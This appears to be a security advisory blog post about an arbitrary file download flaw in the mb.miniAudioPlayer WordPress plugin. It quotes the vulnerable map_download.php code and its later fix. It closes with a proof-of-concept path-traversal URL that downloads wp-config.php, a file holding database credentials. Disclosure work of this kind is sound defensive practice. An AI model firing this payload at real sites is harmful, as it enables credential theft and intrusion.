From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.
Recently we had a request on this website for the following URL:
That looked like an attempt to exploit an arbitrary file viewing vulnerability in the plugin mb.miniAudioPlayer. In looking for any previously released details on that type of vulnerability we found a vague disclosure from November of 2015.
In looking back at old versions we found that as of version 1.2.7 the code in the file map_download.php was the following:
5 6 7 8 9 10 11 12 13
$file_name = $_GET["filename"]; $file_url = $_GET["fileurl"]; header("Content-Description: File Transfer"); header('Content-type: application/mp3'); header("Content-Transfer-Encoding: Binary"); header("Content-disposition: attachment; filename=\"".$file_name."\""); readfile($file_url); exit;
That code will cause the contents of the file specified by the GET input “fileurl” to be downloaded.
In the subsequent version, which was released in April of 2013, the code in the file was changed. The extension of the file specified is determined:
9 10 11 12 13
$file_extension = strtolower (substr (strrchr ($filename, '.'), 1)) ; //This will set the Content-Type to the appropriate setting for the file switch ($file_extension)
And if files with certain extensions are being requested the code stops running:
68 69 70 71 72
case 'php': case 'htm': case 'html': case 'txt': die ('<b>Cannot be used for '. $file_extension .' files!</b>') ;
Subsequent versions added additional restrictions.
Proof of Concept
The following proof of concept will download the contents of the WordPress configuration file, wp-config.php.
Make sure to replace “[path to WordPress]” with the location of WordPress.
http://[path to WordPress]/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=../../../wp-config.php